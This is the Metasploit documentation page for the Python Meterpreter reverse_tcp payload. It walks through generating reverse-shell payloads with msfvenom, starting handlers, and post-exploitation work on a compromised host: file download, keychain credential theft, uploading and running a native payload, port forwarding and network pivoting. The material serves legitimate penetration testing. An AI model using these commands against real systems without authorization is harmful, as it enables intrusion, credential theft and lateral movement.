metasploit-framework/documentation/modules/payload/python/meterpreter/reverse_tcp.md

10 KiB

python/meterpreter/reverse_tcp allows you to remotely control the compromised system. It is a unique payload to the Metasploit Framework, because it is cross-platform. And since Python is a very popular programming language, some operating systems such as Ubuntu even support it by default.

When using an exploit, using a cross-platform payload like python/meterpreter/reverse_tcp also means you don't need to worry about which target/platform to select, the payload should work for all of them.

Vulnerable Application

The Python Meterpreter is suitable for any systems that support Python. Some operating systems such as Ubuntu, Debian, Arch Linux, and OS X have it by default. The Python Meterpreter supports the CPython implementation versions 2.5-2.7 and 3.1+.

Deploying python/meterpreter/reverse_tcp

python/meterpreter/reverse_tcp is typically used in two different ways.

First, it can be used with an exploit as long as the Python platform is supported. This sort of information can usually be found when you use the info command like this:

msf exploit(ms14_064_packager_python) > info

       Name: MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python
     Module: exploit/windows/fileformat/ms14_064_packager_python
   Platform: Python
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-11-12

.... more info here ...

Or, you can check the exploit's target list by doing show targets, there might be Python on the list.

If your exploit supports Python, here is how to load it:

  1. In msfconsole, select the exploit.
  2. Configure the options for that exploit.
  3. Do: set PAYLOAD python/meterpreter/reverse_tcp
  4. Set the LHOST datastore option, which is the IP that the payload should connect to.
  5. Do exploit. If the exploit is successful, it should execute that payload.

Another way to use the Python Meterpreter is to generate it as a Python file. Normally, you would want to do this with msfvenom, like this:

./msfvenom -p python/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/python.py

Important Basic Commands

Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the Python Meterpreter has less commands, but here's a list of all the common ones you might need:

pwd command

The pwd command tells you the current working directory. For example:

meterpreter > pwd
/Users/sinn3r/Desktop

cd command

The cd command allows you to change directories. Example:

meterpreter > cd /Users/sinn3r/Desktop
meterpreter > pwd
/Users/sinn3r/Desktop

cat command

The cat command allows you to see the content of a file:

meterpreter > cat /tmp/data.txt
Hello World!

upload command

The upload command allows you to upload a file to the remote target. For example:

meterpreter > upload /tmp/data.txt /Users/sinn3r/Desktop
[*] uploading  : /tmp/data.txt -> /Users/sinn3r/Desktop
[*] uploaded   : /tmp/data.txt -> /Users/sinn3r/Desktop/data.txt
meterpreter >

download command

The download command allows you to download a file from the remote target to your machine. For example:

meterpreter > download /Users/sinn3r/Desktop/data.txt /tmp/pass.txt
[*] downloading: /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt
[*] download   : /Users/sinn3r/Desktop/data.txt -> /tmp/pass.txt/data.txt
meterpreter >

search command

The search command allows you to find files on the remote file system. For example, this shows how to find all text files in the current directory:

meterpreter > search -d . -f *.txt
Found 2 results...
    .\pass.txt (13 bytes)
    ./creds\data.txt (83 bytes)
meterpreter >

Without the -d option, the command will attempt to search in all drives.

The -r option for the command allows you to search recursively.

getuid command

The getuid command tells you the current user that Meterpreter is running on. For example:

meterpreter > getuid
Server username: root

execute command

The execute command allows you to execute a command or file on the remote machine.

The following examples uses the command to create a text file:

meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
Process 73642 created.
meterpreter >

ps command

The ps command lists the running processes on the remote machine.

shell command

The shell command allows you to interact with the remote machine's command prompt (or shell). For example:

meterpreter > shell
Process 74513 created.
Channel 2 created.
sh-3.2#

If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.

sysinfo

The sysinfo command shows you basic information about the remote machine. Such as:

  • Computer name
  • OS name
  • Architecture
  • Meterpreter type

Using a Post Module

One of the best things about Meterprter is you have access to a variety of post modules that "shell" sessions might not have. Post modules provide you with more capabilities to collect data from the remote machine automatically. For example, stealing credentials from the system or third-party applications, or modify settings, etc.

To use a post module from the Meterpreter prompt, simply use the run command. The following is an example of collecting OS X keychain information using the enum_keychain post module:

meterpreter > run post/osx/gather/enum_keychain

[*] The following keychains for root were found:
    "/Users/sinn3r/Library/Keychains/login.keychain"
    "/Library/Keychains/System.keychain"
[+] 192.168.1.209:58023 - Keychain information saved in /Users/sinn3r/.msf4/loot/20160705211412_http_192.168.1.209_macosx.keychain._271980.txt
meterpreter >

Using the Post Exploitation API in IRB

To enter IRB, do the following at the Meterpreter prompt:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>>

The client object

The client object in Meterpreter allows you to control or retrieve information about the host. For example, this allows you to get the current privilege our payload is running as:

>> client.sys.config.getuid
=> "root"

To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it:

>> client.inspect

You can also use the #methods method to see what methods you can use:

>> client.methods

To review the source of the method, you can use the #source_location method. For example, say we want to see the source code for the #getuid method:

>> client.sys.config.method(:getuid).source_location
=> ["/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32]

The first element of the array is the location of the file. The second is the line number of the method.

Railgun

If you are familiar with using the post exploitation API for Windows, you probably know about Railgun. Unfortunately, Railgun is not available in Python Meterpreters.

Switching to a Native Meterpreter

The Python Meterpreter currently does not quite have the same strength as a native Meterpreter, therefore there are times you will want to migrate to a native one to expose yourself with more features.

There are many ways to migrate to a native Meterpreter, some common approaches:

Example 1: Upload and Execute

Step 1: Produce a native Meterpreter, such as:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=5555 -f exe -o /tmp/native.exe

Step 2: Start another handler for the native payload:

./msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST [IP]; set LPORT 5555; run"

Step 3: Upload the native via the Python Meterpreter session:

meterpreter > upload /tmp/native.exe C:\\Users\\sinn3r\\Desktop
[*] uploading  : /tmp/native.exe -> C:\Users\sinn3r\Desktop
[*] uploaded   : /tmp/native.exe -> C:\Users\sinn3r\Desktop\native.exe
meterpreter >

Step 4: Execute the native payload:

meterpreter > execute -H -f C:\\Users\\sinn3r\\Desktop\\native.exe
Process 2764 created.

And then your other handler (for the native payload) should receive that session:

[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.1.220
[*] Meterpreter session 1 opened (192.168.1.209:5555 -> 192.168.1.220:49306) at 2016-07-05 21:48:04 -0500

meterpreter > sysinfo
Computer        : WIN-6NH0Q8CJQVM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

Example 2: Using exploit/multi/script/web_delivery

Another way to migrate to a native Meterpreter is by using the exploit/multi/script/web_delivery module. To learn how, please read the module documentation for that module.

Routing through the portfwd command

The portfwd command allows you to talk to a remote service like it's local. For example, if you cannot talk to the SMB service remotely on the compromised host because it is firewalled, then you can use portfwd to establish that tunnel:

meterpreter > portfwd add -l 445 -p 445 -r 192.168.1.220
[*] Local TCP relay created: :445 <-> 192.168.1.220:445
meterpreter > portfwd

Active Port Forwards
====================

   Index  Local        Remote             Direction
   -----  -----        ------             ---------
   1      0.0.0.0:445  192.168.1.220:445  Forward

And then talk to it like it's a local service:

msf auxiliary(smb_version) > run

[*] 127.0.0.1:445         - Host is running Windows 7 Ultimate SP1 (build:7601)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Routing through msfconsole

The route command from the msf prompt can also be used to bypass firewall like portfwd, but it also allows you to connect to hosts on a different network through the compromised machine.

To do that, first off, look at the ifconfig/ipconfig output and determine your pivot point:

meterpreter > ipconfig

Make sure you know the subnet, netmask, and the Meterpreter/session ID. Return to the msf prompt, and establish that route:

msf > route add 192.168.1.0 255.255.255.0 1

At that point, you should have a working pivot. You can use other Metasploit modules to explore or exploit more hosts on the network, or use auxiliary/server/socks4a and Proxychains to allow other third-party tools to do the same.